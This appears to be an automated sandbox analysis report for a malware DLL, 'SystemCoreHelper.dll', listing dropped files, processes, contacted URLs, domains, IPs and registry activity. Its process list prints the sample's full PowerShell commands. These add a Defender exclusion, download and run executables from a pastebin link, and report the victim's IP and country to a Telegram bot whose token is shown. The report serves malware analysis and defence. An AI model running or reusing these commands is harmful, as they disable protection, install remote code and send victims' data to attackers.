Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SystemCoreHelper.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline
|
Unicode text, UTF-8 (with BOM) text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\gdi32.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Temp\mxtvcgq32fe.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Windows\Temp\zbjnkzvo4cc.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mxtvcgq32fe.exe_2711dd6c6a3b59b8793a33de2e9dd423a0e18fda_3fac82b3_3bc73dfe-16ee-4cd7-86e6-7d6e4a7cc3f2\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zbjnkzvo4cc.exe_91fe3a34c9bbb1a5c2a345995be1177710a47ccf_18147d42_94eee511-b823-4a99-9fbc-9de814976ec1\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9937.tmp.dmp
|
Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:23 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9ADE.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B0E.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA136.tmp.dmp
|
Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:25 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA221.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA241.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
|
CSV text
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.out
|
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES42BA.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:39 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES4E05.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:42 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13fc3ogo.uak.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15jqxtjq.hkd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1orbsapq.wyl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2o43gfxp.h4v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sjpdqgj.h4g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05cgiua.zdo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a52qms5h.fjq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqav4vig.c53.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icvqyrfv.zpf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdbur53d.kdq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp5tco20.szp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kviy4fw3.e32.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0ckb41q.zwv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojrbkcgi.itt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqnzesou.fjq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pndwk0xa.t55.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxo3gpyr.d4u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqaz4qom.22v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrsxaunj.nde.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtlrdxqq.eqw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlwrwphu.4pp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjuks1mu.5zg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yskoygp4.sbn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zl5m4w5j.y0x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline
|
Unicode text, UTF-8 (with BOM) text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.out
|
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
|
modified
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
|
||
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
|
||
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object
System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'),
'C:\Windows\Temp\zbjnkzvo4cc.exe')"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object
System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'),
'C:\Windows\Temp\mxtvcgq32fe.exe')"
|
||
C:\Windows\Temp\zbjnkzvo4cc.exe
|
"C:\Windows\Temp\zbjnkzvo4cc.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
|
||
C:\Windows\Temp\mxtvcgq32fe.exe
|
"C:\Windows\Temp\mxtvcgq32fe.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
|
||
C:\Windows\System32\loaddll32.exe
|
loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp"
"c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp"
"c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 29 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://frogs-severz.sbs/api
|
104.21.88.250
|
||
http://192.81.132.76/b.exe
|
192.81.132.76
|
||
https://frogs-severz.sbs/api7M
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
https://revirepart.biz/
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
https://frogs-severz.sbs/apibubM
|
unknown
|
||
http://crl.micro/
|
unknown
|
||
https://pastebin.com/raw/nqfy14gm
|
unknown
|
||
https://pastebin.com/rawNQfY14gm
|
unknown
|
||
https://ipinfo.io/iphZ_l
|
unknown
|
||
https://revirepart.biz/api
|
172.67.184.174
|
||
https://frogs-severz.sbs/apis
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://www.microsoft.co1
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://frogs-severz.sbs/((
|
unknown
|
||
https://frogs-severz.sbs/9
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.all
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://192.81.132.76
|
unknown
|
||
https://ipinfo.io/countryhZ_l
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://frogs-severz.sbs/apiV
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://ipinfo.io
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.microsoft.cou
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ipinfo.io
|
unknown
|
||
https://frogs-severz.sbs:443/api
|
unknown
|
||
http://crl.mi
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://ipinfo.io/country
|
34.117.59.81
|
||
https://frogs-severz.sbs/
|
unknown
|
||
https://aka.ms/pscore6lBdq
|
unknown
|
||
revirepart.biz
|
|||
https://support.microsof
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://pastebin.com/raw/NQfY14gm
|
104.20.3.235
|
||
https://frogs-severz.sbs/s
|
unknown
|
||
https://ipinfo.i
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
http://pastebin.com
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
https://pastebin.com
|
unknown
|
||
https://ipinfo.io/ip
|
34.117.59.81
|
There are 57 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
frogs-severz.sbs
|
104.21.88.250
|
||
ipinfo.io
|
34.117.59.81
|
||
revirepart.biz
|
172.67.184.174
|
||
api.telegram.org
|
149.154.167.220
|
||
pastebin.com
|
104.20.3.235
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.81.132.76
|
unknown
|
United States
|
||
104.21.88.250
|
frogs-severz.sbs
|
United States
|
||
104.20.3.235
|
pastebin.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
34.117.59.81
|
ipinfo.io
|
United States
|
||
172.67.184.174
|
revirepart.biz
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
ProgramId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
FileId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
LowerCaseLongPath
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
LongPathHash
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Name
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
OriginalFileName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Publisher
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Version
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
BinFileVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
BinaryType
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
ProductName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
ProductVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
LinkDate
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
BinProductVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
AppxPackageFullName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Size
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Language
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
ProgramId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
FileId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
LowerCaseLongPath
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
LongPathHash
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Name
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
OriginalFileName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Publisher
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Version
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
BinFileVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
BinaryType
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
ProductName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
ProductVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
LinkDate
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
BinProductVersion
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
AppxPackageFullName
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Size
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Language
|
||
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
|
Usn
|
There are 45 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
68C11000
|
unkown
|
page read and write
|
||
7B00000
|
